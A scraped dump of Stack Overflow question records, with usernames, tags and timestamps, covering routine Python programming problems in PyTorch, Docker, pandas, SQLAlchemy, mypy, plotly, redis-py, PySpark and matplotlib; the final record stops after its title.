| 2
| 461
|
krishna lodha
|
76,305,881
| 14,125,436
|
How to set multiple conditions in an if statement for a PyTorch tensor
|
<p>I have a pytorch tensor and want to mask part of it and put the masked section in an if statement. This is my tensor:</p>
<pre><code>import torch

all_data = torch.tensor([[1.1, 0.4],
                         [1.7, 2.7],
                         [0.9, 0.7],
                         [0.9, 3.5],
                         [0.1, 0.5]])

if [(all_data[:, 0] < 1) & (all_data[:, 1] < 1)]:  # I have two conditions
    print('Masked')
else:
    print('Not_Masked')
</code></pre>
<p>This piece of code is not working correctly because it evaluates the condition on the whole tensor at once, while I want to check the tensor row by row: the first and second rows do not fulfill the condition, and I want to print <code>Not_Masked</code>; the third row fulfills it, and I want to have <code>Masked</code> printed, and so on.
I appreciate any help.</p>
|
<python><if-statement><pytorch><conditional-statements>
|
2023-05-22 11:51:37
| 1
| 1,081
|
Link_tester
|
76,305,701
| 3,740,652
|
Python app: passing a config file through Docker
|
<p>I created a stand-alone application with Python 3 that accepts a file as input; however, I am not able to get it to work properly.
Once installed on my system, I run the application as <code>myapp -accounts ./accounts.yaml</code>.</p>
<p>Now, I am trying to replicate this behaviour on a Docker container: I would like to do something like <code>docker run --name myapp myapplatest -accounts ./accounts.yaml</code> where the file <code>accounts.yaml</code> is stored in the local folder. However, I am still receiving this error:</p>
<pre class="lang-bash prettyprint-override"><code>Traceback (most recent call last):
File "/usr/local/bin/myapp", line 8, in <module>
sys.exit(main())
File "/usr/local/lib/python3.7/dist-packages/myapp/main.py", line 17, in main
with open(args.accounts, "r") as acc:
FileNotFoundError: [Errno 2] No such file or directory: '/usr/local/lib/python3.7/dist-packages/myapp/accounts.yaml'
</code></pre>
<hr />
<p>Here it is the latest part of the <code>Dockerfile</code> I created for the app</p>
<pre><code>RUN mkdir /home/myapp
WORKDIR /home/myapp
RUN apt install -y python3-pip
COPY . .
RUN python3 -m pip install --upgrade pip
RUN python3 -m pip install -r requirements.txt
RUN python3 -m pip install .
ENTRYPOINT ["myapp"] CMD[""]
</code></pre>
<p>The <code>cli.py</code> used to catch the args is</p>
<pre class="lang-py prettyprint-override"><code>def full_path(string: str):
script_dir = os.path.dirname(__file__)
return os.path.normpath(os.path.join(script_dir, string))
def myapp_args(parser: argparse.ArgumentParser):
parser.add_argument("-accounts", type=full_path, default="../accounts.yaml",
help="Specify the Yaml file containing the accounts information")
return parser.parse_args()
</code></pre>
<p>The <code>main.py</code> just calls the parser</p>
<pre class="lang-py prettyprint-override"><code>def main():
parser = argparse.ArgumentParser()
args = myapp_args(parser)
with open(args.accounts, "r") as acc:
accounts = yaml.safe_load(acc)
</code></pre>
<p>The <code>setup.py</code> contains the following line of code to install correctly the package</p>
<pre class="lang-py prettyprint-override"><code> include_package_data=True,
entry_points={
'console_scripts': [
'myapp = myapp.main:main',
],
},
</code></pre>
<hr />
<p>I tried to run Docker sharing a folder that contains the file <code>accounts.yaml</code>, but with no success:
<code>docker run --name myapp --mount type=bind,source="$(pwd)"/accounts.yaml,target=/home/myapp/accounts.yml myapp:latest -accounts ./accounts.yaml</code>
I always get the same error.
What could it be? I do not understand why it looks for the file under <code>/usr/local/lib...</code> while I am invoking the command in the <code>WORKDIR</code>.</p>
<h1>EDIT</h1>
<p>I think I explained the question poorly. I have no problems passing the file into the container. If I enter it and list the files, the <code>accounts.yaml</code> is there, in the project root:</p>
<pre class="lang-bash prettyprint-override"><code> docker run --name myapp -it --entrypoint sh --mount type=bind,source="$(pwd)"/accounts.yaml,target=/home/myapp/accounts.yaml myapp:latest
# ls
Dockerfile README.md myapp myapp.png requirements.txt sonar-project.properties
MANIFEST.in accounts.yaml setup.py
# exit
</code></pre>
<p>However, the error is the first one I posted in the question: the program looks for the file under <code>/usr/local/lib...</code> rather than in the project root where it is invoked.</p>
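<p>The traceback itself points at the likely cause: <code>full_path</code> joins the argument onto <code>os.path.dirname(__file__)</code>, which after <code>pip install</code> is the site-packages directory of the installed package, not the directory the command is invoked from. A minimal sketch of a resolver based on the working directory instead (an assumption about the intent: paths should be relative to where the user runs <code>myapp</code>):</p>

```python
import os

def full_path(string: str) -> str:
    # Resolve relative paths against the current working directory (where the
    # command is invoked), not against the installed package's directory
    # (os.path.dirname(__file__), which in the container is site-packages).
    return os.path.abspath(string)

print(full_path("accounts.yaml"))
```

<p>Separately, note that the sample <code>docker run</code> command mounts the file as <code>accounts.yml</code> while the application is passed <code>accounts.yaml</code>, so the target name would also need to match.</p>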
|
<python><docker><parameter-passing><docker-entrypoint>
|
2023-05-22 11:29:00
| 0
| 372
|
net_programmer
|
76,305,700
| 11,974,163
|
How to extract values from excel worksheets to get desired calculation using python
|
<p>So I have 3 worksheets in excel, let's call them <code>sheet_a</code>, <code>sheet_b</code> and <code>sheet_c</code>.</p>
<pre><code>sheet_a:
type formula
0 type_a A+B
1 type_b A
2 type_c A/(A+B)
3 type_d A/B
sheet_b:
dish ingredient map
0 type_a fish B
1 type_a potato A
2 type_b bread A
3 type_c chocolate B
4 type_c carrot A
5 type_d potato A
6 type_d orange B
sheet_c:
ingredient cost
0 fish 1
1 bread 3
2 carrot 2
3 potato 6
4 orange 2
</code></pre>
<p>What I'm finding tricky is getting the cost values, given the cost formula in <code>sheet_a</code>, the mapping values in <code>sheet_b</code>, and the cost values in <code>sheet_c</code>.</p>
<p>So for example to get the cost value for <code>type_a</code>:</p>
<pre><code>type_a:
>>> A+B
>>> potato + fish
>>> 6 + 1
7
</code></pre>
<p>What I want is an output list of values in the same order as they appear in <code>sheet_a</code>; <code>type_a</code>, <code>type_b</code>, <code>type_c</code> and <code>type_d</code>.</p>
<p>Expected output:</p>
<p><code>[7, 3, NaN, 3]</code> - <code>NaN</code> because chocolate has no value in <code>sheet_c</code>.</p>
<p>So far I haven't been able to get the desired output. I've managed to get to a stage where I have a dictionary with the types as keys and lists of A and B combinations as values.</p>
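<p>One way to finish from that dictionary idea: merge the ingredient costs onto <code>sheet_b</code>, build one <code>{'A': cost, 'B': cost}</code> lookup per type, then evaluate each formula with those values. A sketch with the data inlined as DataFrames (in practice they would come from <code>pd.read_excel</code>), reproducing the expected <code>[7, 3, NaN, 3]</code>:</p>

```python
import pandas as pd
import numpy as np

sheet_a = pd.DataFrame({"type": ["type_a", "type_b", "type_c", "type_d"],
                        "formula": ["A+B", "A", "A/(A+B)", "A/B"]})
sheet_b = pd.DataFrame({"dish": ["type_a", "type_a", "type_b", "type_c",
                                 "type_c", "type_d", "type_d"],
                        "ingredient": ["fish", "potato", "bread", "chocolate",
                                       "carrot", "potato", "orange"],
                        "map": ["B", "A", "A", "B", "A", "A", "B"]})
sheet_c = pd.DataFrame({"ingredient": ["fish", "bread", "carrot", "potato", "orange"],
                        "cost": [1, 3, 2, 6, 2]})

# Attach a cost to every (dish, map) pair; missing ingredients become NaN.
merged = sheet_b.merge(sheet_c, on="ingredient", how="left")
# One {"A": cost, "B": cost} dict per type.
lookup = {dish: dict(zip(g["map"], g["cost"])) for dish, g in merged.groupby("dish")}

def evaluate(row):
    vals = lookup.get(row["type"], {})
    a, b = vals.get("A", np.nan), vals.get("B", np.nan)
    # Formulas only use A and B, so a restricted eval is enough here.
    return eval(row["formula"], {"__builtins__": {}}, {"A": a, "B": b})

costs = [evaluate(r) for _, r in sheet_a.iterrows()]
print([float(c) for c in costs])  # [7.0, 3.0, nan, 3.0]
```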
|
<python><excel><oop><openpyxl>
|
2023-05-22 11:28:57
| 1
| 457
|
pragmatic learner
|
76,305,685
| 7,796,211
|
Update many-to-many table with removed duplicates
|
<p>I have three models: <code>Author</code>, <code>Book</code>, and <code>BookAuthor</code>. The <code>BookAuthor</code> model represents a many-to-many relationship between <code>Author</code> and <code>Book</code>, i.e., a book can have multiple authors and a person can write multiple books.</p>
<p>I need to parse a file of books and store the books, authors, and their relationships in a database. I want to remove any duplicate authors from the <code>Author</code> model when I save these records, which means I need to update the relationships in the <code>BookAuthor</code> association object with the deduplicated author IDs.</p>
<p>How would I remove the duplicate authors while preserving the many-to-many relationships between their books?</p>
<p>Here's a minimal reproducible example:</p>
<pre class="lang-py prettyprint-override"><code>from sqlalchemy import ForeignKey, Integer, String, create_engine
from sqlalchemy.orm import DeclarativeBase, Mapped, Session, mapped_column, relationship
import pandas as pd
class Base(DeclarativeBase):
pass
class BookAuthor(Base):
__tablename__ = "book_author"
book_id: Mapped[int] = mapped_column(ForeignKey("book.id"), primary_key=True)
author_id: Mapped[int] = mapped_column(ForeignKey("author.id"), primary_key=True)
book: Mapped["Book"] = relationship(back_populates="authors")
author: Mapped["Author"] = relationship(back_populates="books")
class Book(Base):
__tablename__ = "book"
id: Mapped[int] = mapped_column(primary_key=True)
title: Mapped[str] = mapped_column(String(2048))
authors: Mapped[list["BookAuthor"]] = relationship(back_populates="book")
class Author(Base):
__tablename__ = "author"
id: Mapped[int] = mapped_column(primary_key=True)
first_name: Mapped[str] = mapped_column(String(256))
last_name: Mapped[str] = mapped_column(String(256))
date_of_birth: Mapped[int] = mapped_column(Integer, nullable=True)
date_of_death: Mapped[int] = mapped_column(Integer, nullable=True)
books: Mapped[list["BookAuthor"]] = relationship(back_populates="author")
engine = create_engine("sqlite:///books.db")
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
books = [
{
"title": "Good Omens: The Nice and Accurate Prophecies of Agnes Nutter, Witch",
"authors": [
{
"first_name": "Terry",
"last_name": "Pratchett",
"date_of_birth": 1948,
"date_of_death": 2015,
},
{
"first_name": "Neil",
"last_name": "Gaiman",
"date_of_birth": 1960,
"date_of_death": None,
},
],
},
{
"title": "American Gods",
"authors": [
{
"first_name": "Neil",
"last_name": "Gaiman",
"date_of_birth": 1960,
"date_of_death": None,
},
],
},
{
"title": "The Talisman",
"authors": [
{
"first_name": "Stephen",
"last_name": "King",
"date_of_birth": 1947,
"date_of_death": None,
},
{
"first_name": "Peter",
"last_name": "Straub",
"date_of_birth": 1943,
"date_of_death": 2022,
},
],
},
{
"title": "The Shining",
"authors": [
{
"first_name": "Stephen",
"last_name": "King",
"date_of_birth": 1947,
"date_of_death": None,
},
],
},
{
"title": "It",
"authors": [
{
"first_name": "Stephen",
"last_name": "King",
"date_of_birth": 1947,
"date_of_death": None,
},
],
},
]
with Session(engine) as session:
for book in books:
book_db = Book(title=book["title"])
for author in book["authors"]:
author_db = Author(
first_name=author["first_name"],
last_name=author["last_name"],
date_of_birth=author["date_of_birth"],
date_of_death=author["date_of_death"],
)
book_author = BookAuthor(book=book_db, author=author_db)
session.add(book_author)
session.commit()
book_authors = str(
session.query(BookAuthor)
.join(Book)
.join(Author)
.with_entities(
BookAuthor.book_id.label("book_id"),
BookAuthor.author_id.label("author_id"),
Author.first_name,
Author.last_name,
Author.date_of_birth,
Author.date_of_death,
Book.title,
)
)
print(pd.read_sql_query(sql=book_authors, con=engine).to_string(index=False))
</code></pre>
<p>This outputs the following table:</p>
<pre><code>+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
| book_id | author_id | author_first_name | author_last_name | author_date_of_birth | author_date_of_death | book_title |
+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
| 1 | 1 | Terry | Pratchett | 1948 | 2015.0 | Good Omens: The Nice and Accurate Prophecies of Agnes Nutter, Witch |
| 1 | 2 | Neil | Gaiman | 1960 | | Good Omens: The Nice and Accurate Prophecies of Agnes Nutter, Witch |
| 2 | 3 | Neil | Gaiman | 1960 | | American Gods |
| 3 | 4 | Stephen | King | 1947 | | The Talisman |
| 3 | 5 | Peter | Straub | 1943 | 2022.0 | The Talisman |
| 4 | 6 | Stephen | King | 1947 | | The Shining |
| 5 | 7 | Stephen | King | 1947 | | It |
+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
</code></pre>
<p>What I want:</p>
<pre><code>+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
| book_id | author_id | author_first_name | author_last_name | author_date_of_birth | author_date_of_death | book_title |
+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
| 1 | 1 | Terry | Pratchett | 1948 | 2015.0 | Good Omens: The Nice and Accurate Prophecies of Agnes Nutter, Witch |
| 1 | 2 | Neil | Gaiman | 1960 | | Good Omens: The Nice and Accurate Prophecies of Agnes Nutter, Witch |
| 2 | 2 | Neil | Gaiman | 1960 | | American Gods |
| 3 | 3 | Stephen | King | 1947 | | The Talisman |
| 3 | 4 | Peter | Straub | 1943 | 2022.0 | The Talisman |
| 4 | 3 | Stephen | King | 1947 | | The Shining |
| 5 | 3 | Stephen | King | 1947 | | It |
+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
</code></pre>
<p>Duplicate authors are defined as having the same <code>first_name</code>, <code>last_name</code>, <code>date_of_birth</code>, and <code>date_of_death</code> attributes.</p>
<p>Note: I need to avoid Python data structures and delegate most of the work to the database itself. The data source contains millions of records and handling duplicates in a Python list or dictionary would simply consume too much memory.</p>
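<p>Since the work must stay in the database, one set-based approach (a sketch against a simplified copy of the schema, using raw SQL for clarity): map every author id to the smallest id sharing the same identity, repoint <code>book_author</code> at that canonical id, then delete the orphaned duplicates. Note the surviving ids are the smallest duplicates' ids (Stephen King keeps id 4 here rather than being renumbered to 3) — ids need not be dense for the relationships to be correct:</p>

```python
from sqlalchemy import create_engine, text

engine = create_engine("sqlite://")  # in-memory stand-in for the real DB
with engine.begin() as conn:
    conn.execute(text("CREATE TABLE author (id INTEGER PRIMARY KEY, first_name TEXT, "
                      "last_name TEXT, date_of_birth INTEGER, date_of_death INTEGER)"))
    conn.execute(text("CREATE TABLE book_author (book_id INTEGER, author_id INTEGER)"))
    conn.execute(text("INSERT INTO author VALUES "
                      "(1,'Terry','Pratchett',1948,2015),(2,'Neil','Gaiman',1960,NULL),"
                      "(3,'Neil','Gaiman',1960,NULL),(4,'Stephen','King',1947,NULL),"
                      "(5,'Peter','Straub',1943,2022),(6,'Stephen','King',1947,NULL),"
                      "(7,'Stephen','King',1947,NULL)"))
    conn.execute(text("INSERT INTO book_author VALUES "
                      "(1,1),(1,2),(2,3),(3,4),(3,5),(4,6),(5,7)"))

    # Repoint every relationship at the smallest id with the same identity.
    # 'IS' gives NULL-safe equality in SQLite (date_of_death may be NULL).
    conn.execute(text("""
        UPDATE book_author
        SET author_id = (
            SELECT MIN(a2.id)
            FROM author a1 JOIN author a2
              ON a1.first_name = a2.first_name
             AND a1.last_name = a2.last_name
             AND a1.date_of_birth IS a2.date_of_birth
             AND a1.date_of_death IS a2.date_of_death
            WHERE a1.id = book_author.author_id)
    """))
    # Drop the now-unreferenced duplicate authors.
    conn.execute(text("DELETE FROM author WHERE id NOT IN "
                      "(SELECT author_id FROM book_author)"))

    rows = conn.execute(text("SELECT book_id, author_id FROM book_author "
                             "ORDER BY book_id, author_id")).fetchall()
print(rows)
```

<p>The same three statements can be phrased with SQLAlchemy constructs against the real models; the point is that both the canonical-id mapping and the repointing happen entirely server-side, so no author list is ever materialised in Python.</p>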
|
<python><sqlalchemy>
|
2023-05-22 11:27:46
| 0
| 418
|
Thegerdfather
|
76,305,578
| 13,819,183
|
Calling instance of adapter class plugged into port is causing mypy issues
|
<p>I'm currently plugging an adapter into a port via a handler that returns an instance of that port. Here is a simple setup to reproduce:</p>
<pre class="lang-py prettyprint-override"><code>from typing import Protocol
class SomePort(Protocol):
def caller(self):
raise NotImplementedError
class SomeAdapter:
def caller(self):
print("Called")
class SomeController:
@staticmethod
def get_instance(port: SomePort) -> SomePort:
return port()
instance = SomeController.get_instance(port=SomeAdapter)
instance.caller()
</code></pre>
<p>This is working just fine in code but in <code>mypy</code> I'm getting the following issues:</p>
<pre class="lang-bash prettyprint-override"><code>$ mypy --version
mypy 0.931
$ mypy test/test.py
test/test.py:17: error: "SomePort" not callable
test/test.py:20: error: Argument "port" to "get_instance" of "SomeController" has incompatible type "Type[SomeAdapter]"; expected "SomePort"
</code></pre>
<p>Is there anything I've misunderstood here? Running the script prints <code>Called</code> just fine, but mypy is unhappy about the way I've set this up. Any help is appreciated. :)</p>
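<p>A hedged reading of the errors: <code>port: SomePort</code> tells mypy the parameter is an <em>instance</em> of the protocol, but the call site passes the class itself and <code>return port()</code> calls it. Annotating the parameter as a class object should clear both messages (a sketch; <code>Type[SomePort]</code> suits the older mypy shown, <code>type[SomePort]</code> works on newer setups):</p>

```python
from typing import Protocol, Type


class SomePort(Protocol):
    def caller(self) -> None:
        ...


class SomeAdapter:
    def caller(self) -> None:
        print("Called")


class SomeController:
    @staticmethod
    def get_instance(port: Type[SomePort]) -> SomePort:
        # port is the adapter *class*; calling it produces an instance
        # that structurally satisfies SomePort.
        return port()


instance = SomeController.get_instance(port=SomeAdapter)
instance.caller()
```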
|
<python><mypy><python-typing><hexagonal-architecture>
|
2023-05-22 11:13:06
| 1
| 1,405
|
Steinn Hauser Magnússon
|
76,305,410
| 8,541,953
|
Ipywidgets appear separated when displaying them
|
<p>I am creating two simple widgets with <code>ipywidgets</code>, and when displaying them I need them to be close to each other. However, by default they are not shown like this.</p>
<pre><code>import ipywidgets as widgets
label = widgets.Label(value='test:')
checkbox = widgets.Checkbox(indent=False)
float_text = widgets.FloatText()
widgets_box = widgets.HBox([label, checkbox, float_text])
display(widgets_box)
</code></pre>
<p>Why is that? How do I put the FloatText widget right next to the checkbox?</p>
<p><a href="https://i.sstatic.net/EPe5W.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/EPe5W.png" alt="enter image description here" /></a></p>
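<p>The gap usually comes from each widget keeping its default fixed width inside the <code>HBox</code>. One option is to shrink the layouts explicitly (a sketch — the concrete widths are assumptions to tune):</p>

```python
import ipywidgets as widgets

label = widgets.Label(value="test:")
# width="auto" lets the checkbox shrink to its content instead of
# occupying the default widget width that creates the gap.
checkbox = widgets.Checkbox(indent=False,
                            layout=widgets.Layout(width="auto"))
float_text = widgets.FloatText(layout=widgets.Layout(width="100px"))
widgets_box = widgets.HBox([label, checkbox, float_text])
widgets_box  # display(widgets_box) in a notebook cell
```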
|
<python><widget><ipywidgets>
|
2023-05-22 10:49:43
| 1
| 1,103
|
GCGM
|
76,305,333
| 18,374,898
|
plotly write_image() runs forever and doesn't produce any static image
|
<h1>Plotly <code>fig.write_image()</code> takes forever and doesn't produce any image</h1>
<p>I'm using</p>
<pre><code>python 3.10.11
Plotly 5.14.1
kaleido 0.2.1
Win 11 22H2
VSCode 1.78.2
</code></pre>
<p>when I try to execute a cell with <code>fig.write_image('filename.png', format = 'png')</code> the cell just runs forever without producing any <code>.png</code> files.</p>
<p>Task manager shows 3 kaleido.exe running processes.</p>
<p>Kaleido is installed in the same directory as plotly (and the other packages).</p>
<p>On the contrary, <code>write_html()</code> works perfectly with the very same graph and saves a <code>.html</code> graph in a second.</p>
<p><strong>Minimally reproducible example:</strong></p>
<pre><code>import plotly.express as px
fig = px.line(x=[0,1,2], y=[0,1,2])
fig.write_image("plot.png", format = 'png', width = 500, height = 500, scale = 1, engine = 'kaleido')
</code></pre>
<p>Similar questions: <a href="https://stackoverflow.com/questions/69016568/unable-to-export-plotly-images-to-png-with-kaleido">1</a>, <a href="https://github.com/plotly/plotly.py/issues/3744" rel="noreferrer">2</a>, <a href="https://stackoverflow.com/questions/73401325/plotly-write-image-freezes-with-kaleido-0-2-1">3</a></p>
<p><strong>Kinda working solution:</strong> downgrading kaleido to <code>version 0.1.0.post1</code> kinda solved the issue,</p>
<p>but is there a way to make kaleido 0.2.1 work?</p>
|
<python><plotly><kaleido>
|
2023-05-22 10:38:33
| 3
| 320
|
Konstantin Z
|
76,305,312
| 4,571,350
|
How to add another label level to the x-axis
|
<p>I am trying to put a secondary axis on a plot. The first x-axis displays the day of the month. I would like the labels of the secondary axis to be the month names, displayed below the first.</p>
<p>For my first axis I have:</p>
<pre><code>plot={}
plot['W']=axs[0]
plot['W'].xaxis.set_major_formatter(mdates.DateFormatter('%d'))
plot['W'].xaxis.set_minor_locator(mdates.HourLocator(interval=6))
plot['W'].xaxis.set_major_locator(mdates.DayLocator(interval=1))
</code></pre>
<p>In the end it should look like this:<a href="https://i.sstatic.net/RXF4C.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/RXF4C.png" alt="enter image description here" /></a></p>
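<p>One way to get a second row of labels is <code>secondary_xaxis</code> placed slightly below the primary axis, with a <code>MonthLocator</code>/month-name formatter and its own tick marks and spine hidden. A self-contained sketch (offsets and locators are assumptions to tune against the real data):</p>

```python
import datetime as dt
import matplotlib
matplotlib.use("Agg")  # headless backend for this sketch
import matplotlib.dates as mdates
import matplotlib.pyplot as plt

dates = [dt.datetime(2023, 1, 28) + dt.timedelta(days=i) for i in range(8)]
fig, ax = plt.subplots()
ax.plot(dates, range(8))

# Primary axis: day numbers, as in the question.
ax.xaxis.set_major_locator(mdates.DayLocator(interval=1))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%d"))

# Secondary axis slightly below the first, carrying only the month names.
sec = ax.secondary_xaxis(-0.12)
sec.xaxis.set_major_locator(mdates.MonthLocator(bymonthday=15))  # mid-month
sec.xaxis.set_major_formatter(mdates.DateFormatter("%B"))
sec.tick_params(length=0)                 # labels only, no tick marks
sec.spines["bottom"].set_visible(False)   # no duplicated axis line
```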
|
<python><matplotlib><x-axis>
|
2023-05-22 10:36:07
| 1
| 1,365
|
Laetis
|
76,305,257
| 18,108,367
|
The INCRBY instruction executed by a Redis pipeline return a reference to the pipeline instead the value of the key modified
|
<p>I am having trouble using a Redis pipeline. I need to execute 2 commands (<code>incr()</code> and <code>set()</code>) in a <em>Redis transaction</em>.</p>
<p><strong>Environment info</strong>: redis-py version 3.5.3; the version of the Redis server is v=5.0.5.</p>
<p>So I have tried to use the following code (the code example is reproducible):</p>
<pre><code>import redis
r = redis.Redis()
pipe = r.pipeline()
def redis_insertion():
pipe.multi()
testIndex = pipe.incr('testIndex')
pipe.set('new_key:' + str(testIndex), 'new_value')
pipe.execute()
pipe.reset()
redis_insertion()
</code></pre>
<p>By Monitor I can see the real commands executed by the redis server:</p>
<pre><code>> redis-cli monitor
OK
1684750490.821375 [0 127.0.0.1:47322] "MULTI"
1684750490.821394 [0 127.0.0.1:47322] "INCRBY" "testIndex" "1"
1684750490.821400 [0 127.0.0.1:47322] "SET" "new_key:Pipeline<ConnectionPool<Connection<host=localhost,port=6379,db=0>>>" "new_value"
1684750490.821411 [0 127.0.0.1:47322] "EXEC"
</code></pre>
<p>The problem is that the instruction <code>testIndex = pipe.incr('testIndex')</code> returns:</p>
<pre><code>Pipeline<ConnectionPool<Connection<host=localhost,port=6379,db=0>>>
</code></pre>
<p>instead of the value of the key <code>testIndex</code> after the execution of the <code>INCRBY</code> instruction.</p>
<p>Could someone explain this behaviour?</p>
|
<python><redis><transactions><watch><redis-py>
|
2023-05-22 10:29:07
| 2
| 2,658
|
User051209
|
76,305,034
| 11,452,928
|
How to pass option to python when I'm running a jupyter notebook on VS Code
|
<p>I've created a virtual environment using <code>venv</code> and I'm using such environment in Visual Studio Code to run a jupyter notebook.</p>
<p>Now my code stops running, and in the log I can read two warnings, one of which is:</p>
<pre><code>warning: It seems that frozen modules are being used, which may
0.00s - make the debugger miss breakpoints. Please pass -Xfrozen_modules=off
0.00s - to python to disable frozen modules.
0.00s - Note: Debugging will proceed. Set PYDEVD_DISABLE_FILE_VALIDATION=1 to disable this validation.
</code></pre>
<p>Let's suppose I want to pass <code>-Xfrozen_modules=off</code> to Python to see what happens. How can I do it? I'm not running Python from the command line; I'm just pressing Shift+Enter in Visual Studio Code to execute the code cells of my notebook. How can I pass options to Python in Visual Studio Code?</p>
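<p>Since the kernel is launched by the Jupyter extension, interpreter flags can't be typed per cell; the warning itself suggests the environment-variable route instead. One option (an assumption about a default setup) is a <code>.env</code> file in the workspace root, which the Python extension loads for newly started kernels — restart the kernel afterwards:</p>

```
PYDEVD_DISABLE_FILE_VALIDATION=1
```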
|
<python><visual-studio-code>
|
2023-05-22 10:02:24
| 2
| 753
|
fabianod
|
76,305,020
| 1,648,641
|
pyspark dataframe limiting on multiple columns
|
<p>I wonder if anyone can point me in the right direction with the following problem. In a rather large pyspark dataframe with about 50-odd columns, two of them represent, say, 'make' and 'model'. Something like:</p>
<pre><code>21234234322(unique id) .. .. .. Nissan Navara .. .. ..
73647364736 .. .. .. BMW X5 .. .. ..
</code></pre>
<p>What I would like to know is what the top 2 models per brand are. I can groupby both columns and add a count no problem, but how do I then limit (or filter) that result? I.e. how do I keep the (up to) 2 most popular models per brand and remove the rest?</p>
<p>Whatever I try, I end up iterating over the brands that exist in the original dataframe manually. Is there another way?</p>
|
<python><pyspark>
|
2023-05-22 10:00:57
| 1
| 1,870
|
Lieuwe
|
76,304,997
| 1,113,579
|
Build a dictionary from an object's explicitly declared fields
|
<p>My table definition:</p>
<pre><code>class AppProperties(base):
__tablename__ = "app_properties"
key = Column(String, primary_key=True, unique=True)
value = Column(String)
</code></pre>
<p>Code for updating an app property:</p>
<pre><code>session = Session()
query = session.query(AppProperties).filter(AppProperties.key == "memory")
new_setting = AppProperties(key="memory", value="1 GB")
query.update(new_setting)
</code></pre>
<p>The line <code>query.update(new_setting)</code> fails because the update method requires an iterable.
If I use <code>query.update(vars(new_setting))</code>, it includes some extra values, which are not there in the underlying table and hence fails.</p>
<p>How can I build this dictionary: <code>{"key": "memory", "value": "1 GB"}</code> using the object <code>new_setting</code>, so that I can call the <code>update</code> method using this dictionary?</p>
<p>For example:</p>
<pre><code>query.update({"key": "memory", "value": "1 GB"})
</code></pre>
<p>Because I already have everything in <code>new_setting</code>, I just need to convert it into a dictionary with only those keys which are explicitly declared in the class definition of <code>AppProperties</code>, without inheriting the fields from the base class or any other scope.</p>
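<p>The mapped columns declared on the class are available through <code>__table__.columns</code>, so a small helper can build exactly that dictionary without picking up SQLAlchemy-internal attributes such as <code>_sa_instance_state</code>. A sketch against a simplified copy of the model:</p>

```python
from sqlalchemy import Column, String
from sqlalchemy.orm import declarative_base

base = declarative_base()


class AppProperties(base):
    __tablename__ = "app_properties"
    key = Column(String, primary_key=True, unique=True)
    value = Column(String)


def to_dict(obj) -> dict:
    # __table__.columns lists only the columns declared on this model,
    # so nothing inherited from the instrumentation leaks in.
    return {c.key: getattr(obj, c.key) for c in obj.__table__.columns}


new_setting = AppProperties(key="memory", value="1 GB")
print(to_dict(new_setting))  # {'key': 'memory', 'value': '1 GB'}
```

<p>The result can then be passed straight to the query: <code>query.update(to_dict(new_setting))</code>.</p>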
|
<python><sqlalchemy>
|
2023-05-22 09:57:32
| 1
| 1,276
|
AllSolutions
|
76,304,987
| 3,849,662
|
Stacked bar charts with differing x axes
|
<p>I am using matplotlib to create a stacked barchart.</p>
<p>I have multiple arrays to plot but will simplify to 2 for the sake of this question.</p>
<pre><code>rates = [4, 4.1, 4.2, 4.3, 4.4, 4.5]
counts = [12, 17, 22, 9, 12, 18]
rates1 = [4.3, 4.4]
counts1 = [24, 17]
</code></pre>
<p>I want to plot a barchart for rates against counts, with the rates1 bar stacked above it.</p>
<p>I am getting an error due to the mismatched size of the arrays.</p>
<p>I believe I need to fill in where the rates are "missing", e.g. 4.1 in <code>rates1</code>, with a zero value, but I don't want to hardcode this. I also can't just pad the end of the list with zeroes, as then the counts won't align with the correct rate.</p>
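<p>One way to do that alignment without hardcoding: take the union of all rates as the shared x positions, then look each series up with a default of 0. A sketch:</p>

```python
import matplotlib
matplotlib.use("Agg")  # headless backend for the sketch
import matplotlib.pyplot as plt

rates = [4, 4.1, 4.2, 4.3, 4.4, 4.5]
counts = [12, 17, 22, 9, 12, 18]
rates1 = [4.3, 4.4]
counts1 = [24, 17]

# Shared x positions: the union of every rate that appears in any series.
all_rates = sorted(set(rates) | set(rates1))
lookup0 = dict(zip(rates, counts))
lookup1 = dict(zip(rates1, counts1))
y0 = [lookup0.get(r, 0) for r in all_rates]  # 0 where a series has no bar
y1 = [lookup1.get(r, 0) for r in all_rates]

fig, ax = plt.subplots()
ax.bar(all_rates, y0, width=0.08)
ax.bar(all_rates, y1, width=0.08, bottom=y0)  # stacked on top of the first
```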
|
<python><matplotlib>
|
2023-05-22 09:56:46
| 1
| 773
|
Joe Smart
|
76,304,851
| 1,113,579
|
VSCode Intellisense for SQLAlchemy query result
|
<p>Below is a code fragment for querying a table using SQLAlchemy and reading the first record:</p>
<pre><code>session = Session()
customer = session.query(Customer).filter(Customer.name == "John").first()
customer.age = 50
</code></pre>
<p>In the 3rd line of code, <code>customer.age = 50</code>, VSCode IntelliSense does not work, perhaps because VSCode cannot infer the return type of the <code>first()</code> method in the previous line.</p>
<p>Is there a way I can use the class cast explicitly or any other workaround, so that the methods and fields of the class <code>Customer</code> become available for its object <code>customer</code> in Intellisense?</p>
<p>EDIT 1:</p>
<p>I have declared class like this:</p>
<pre><code>class Customer(base):
__tablename__ = "customers"
name = Column(String, primary_key=True, unique=True)
age= Column(Float, nullable = False)
</code></pre>
<p>In the VSCode Intellisense, it is showing only the dunder fields of <code>Customer</code>. It is not showing the <code>name</code> and <code>age</code> fields.</p>
<p>Below is the screenshot how it is coming for me in VSCode:</p>
<p><a href="https://i.sstatic.net/zpMTC.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/zpMTC.png" alt="enter image description here" /></a></p>
<p>EDIT 2:</p>
<p>In my VSCode, the following Python related extensions are installed:</p>
<ol>
<li>Pylance</li>
<li>Python</li>
<li>Python Environment Manager</li>
<li>Python Extension Pack</li>
<li>Python Indent</li>
</ol>
|
<python><visual-studio-code><sqlalchemy><intellisense>
|
2023-05-22 09:40:47
| 2
| 1,276
|
AllSolutions
|
76,304,808
| 11,230,924
|
Python regex to match identical city names but formatted differently
|
